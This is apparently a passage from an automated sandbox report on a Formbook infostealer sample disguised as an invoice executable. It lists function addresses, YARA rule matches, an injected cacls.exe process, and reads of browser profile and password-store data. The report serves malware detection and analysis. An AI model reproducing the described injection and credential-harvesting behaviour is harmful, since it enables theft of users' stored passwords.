Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017470C0	3_2_017470C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172D34C	3_2_0172D34C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F132D	3_2_017F132D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0178739A	3_2_0178739A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E12ED	3_2_017E12ED
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175B2C0	3_2_0175B2C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017452A0	3_2_017452A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F7571	3_2_017F7571
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DD5B0	3_2_017DD5B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01731460	3_2_01731460
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FF43F	3_2_017FF43F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FF7B0	3_2_017FF7B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01785630	3_2_01785630
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F16CC	3_2_017F16CC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01749950	3_2_01749950
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175B950	3_2_0175B950
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D5910	3_2_017D5910
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AD800	3_2_017AD800
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017438E0	3_2_017438E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFB76	3_2_017FFB76
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B5BF0	3_2_017B5BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0177DBF9	3_2_0177DBF9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175FB80	3_2_0175FB80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B3A6C	3_2_017B3A6C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFA49	3_2_017FFA49
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F7A46	3_2_017F7A46
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EDAC6	3_2_017EDAC6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DDAAC	3_2_017DDAAC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01785AA0	3_2_01785AA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E1AA3	3_2_017E1AA3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F7D73	3_2_017F7D73
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F1D5A	3_2_017F1D5A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01743D40	3_2_01743D40
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175FDC0	3_2_0175FDC0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B9C32	3_2_017B9C32
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFCF2	3_2_017FFCF2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFF09	3_2_017FFF09
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01703FD2	3_2_01703FD2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01703FD5	3_2_01703FD5
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFFB1	3_2_017FFFB1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01741F92	3_2_01741F92
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01749EB0	3_2_01749EB0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E47F0	11_2_037E47F0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_03805200	11_2_03805200
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E4840	11_2_037E4840
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E67C0	11_2_037E67C0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037ECE4A	11_2_037ECE4A
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037ECE90	11_2_037ECE90
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037ECE8B	11_2_037ECE8B
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E65A0	11_2_037E65A0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E6597	11_2_037E6597
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037EECB0	11_2_037EECB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CA352	12_2_037CA352
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371E3F0	12_2_0371E3F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D03E6	12_2_037D03E6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B0274	12_2_037B0274
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037902C0	12_2_037902C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03798158	12_2_03798158
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037AA118	12_2_037AA118
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03700100	12_2_03700100
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C81CC	12_2_037C81CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D01AA	12_2_037D01AA
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C41A2	12_2_037C41A2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037A2000	12_2_037A2000
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710770	12_2_03710770
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03734750	12_2_03734750
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0370C7C0	12_2_0370C7C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372C6E0	12_2_0372C6E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710535	12_2_03710535
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D0591	12_2_037D0591
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C2446	12_2_037C2446
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B4420	12_2_037B4420
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037BE4F6	12_2_037BE4F6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CAB40	12_2_037CAB40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C6BD7	12_2_037C6BD7
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0370EA80	12_2_0370EA80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03726962	12_2_03726962
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037129A0	12_2_037129A0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037DA9A6	12_2_037DA9A6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371A840	12_2_0371A840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03712840	12_2_03712840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0373E8F0	12_2_0373E8F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_036F68B8	12_2_036F68B8
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03784F40	12_2_03784F40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03730F30	12_2_03730F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B2F30	12_2_037B2F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03752F28	12_2_03752F28
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371CFE0	12_2_0371CFE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03702FC8	12_2_03702FC8
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0378EFA0	12_2_0378EFA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710E59	12_2_03710E59
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CEE26	12_2_037CEE26
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CEEDB	12_2_037CEEDB
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03722E90	12_2_03722E90
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CCE93	12_2_037CCE93
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037ACD1F	12_2_037ACD1F
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371AD00	12_2_0371AD00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0370ADE0	12_2_0370ADE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03728DBF	12_2_03728DBF
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710C00	12_2_03710C00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03700CF2	12_2_03700CF2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B0CB5	12_2_037B0CB5
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_036FD34C	12_2_036FD34C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C132D	12_2_037C132D
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0375739A	12_2_0375739A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B12ED	12_2_037B12ED
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372B2C0	12_2_0372B2C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037152A0	12_2_037152A0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037DB16B	12_2_037DB16B
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0374516C	12_2_0374516C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_036FF172	12_2_036FF172
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371B1B0	12_2_0371B1B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C70E9	12_2_037C70E9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CF0E0	12_2_037CF0E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037170C0	12_2_037170C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037BF0CC	12_2_037BF0CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CF7B0	12_2_037CF7B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03755630	12_2_03755630
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C16CC	12_2_037C16CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C7571	12_2_037C7571
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D95C3	12_2_037D95C3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037AD5B0	12_2_037AD5B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03701460	12_2_03701460
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CF43F	12_2_037CF43F
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFB76	12_2_037CFB76
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03785BF0	12_2_03785BF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0374DBF9	12_2_0374DBF9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372FB80	12_2_0372FB80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03783A6C	12_2_03783A6C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFA49	12_2_037CFA49
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C7A46	12_2_037C7A46
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037BDAC6	12_2_037BDAC6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03755AA0	12_2_03755AA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037ADAAC	12_2_037ADAAC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B1AA3	12_2_037B1AA3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03719950	12_2_03719950
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372B950	12_2_0372B950
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037A5910	12_2_037A5910
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0377D800	12_2_0377D800
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037138E0	12_2_037138E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFF09	12_2_037CFF09
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFFB1	12_2_037CFFB1
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03711F92	12_2_03711F92
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03719EB0	12_2_03719EB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C7D73	12_2_037C7D73
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C1D5A	12_2_037C1D5A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03713D40	12_2_03713D40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372FDC0	12_2_0372FDC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03789C32	12_2_03789C32
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFCF2	12_2_037CFCF2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA1C60	12_2_02DA1C60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9CBD7	12_2_02D9CBD7
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9CBE0	12_2_02D9CBE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9AE80	12_2_02D9AE80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9CE00	12_2_02D9CE00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA52F0	12_2_02DA52F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA34D0	12_2_02DA34D0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA34CB	12_2_02DA34CB
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA348A	12_2_02DA348A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DBB840	12_2_02DBB840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2E347	12_2_03A2E347
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2E7FD	12_2_03A2E7FD
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2E463	12_2_03A2E463
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2CB13	12_2_03A2CB13
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2D868	12_2_03A2D868

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 017AEA12 appears 86 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 01775130 appears 58 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 017BF290 appears 105 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 0172B970 appears 280 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 01787E54 appears 111 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 03757E54 appears 111 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 0377EA12 appears 86 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 0378F290 appears 105 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 036FB970 appears 280 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 03745130 appears 58 times

Source: FACTURA 24V70 VINS.exe, 00000001.00000002.2205462950.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000001.00000000.2175699690.0000000000DF6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehbJm.exe6 vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000001.00000002.2210561438.0000000007D50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000003.00000002.3037746127.00000000011D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCACLS.EXEj% vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000003.00000002.3038189203.000000000182D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe	Binary or memory string: OriginalFilenamehbJm.exe6 vs FACTURA 24V70 VINS.exe

Source: FACTURA 24V70 VINS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: FACTURA 24V70 VINS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, IqK8bsYVEt7haTtUqc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, IqK8bsYVEt7haTtUqc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, IqK8bsYVEt7haTtUqc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/7

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FACTURA 24V70 VINS.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\cacls.exe

File created: C:\Users\user\AppData\Local\Temp\n-T73hKo

Jump to behavior

Source: FACTURA 24V70 VINS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FACTURA 24V70 VINS.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cacls.exe, 0000000C.00000003.3263245463.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4647612526.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4647612526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4647612526.0000000003225000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FACTURA 24V70 VINS.exe

ReversingLabs: Detection: 63%

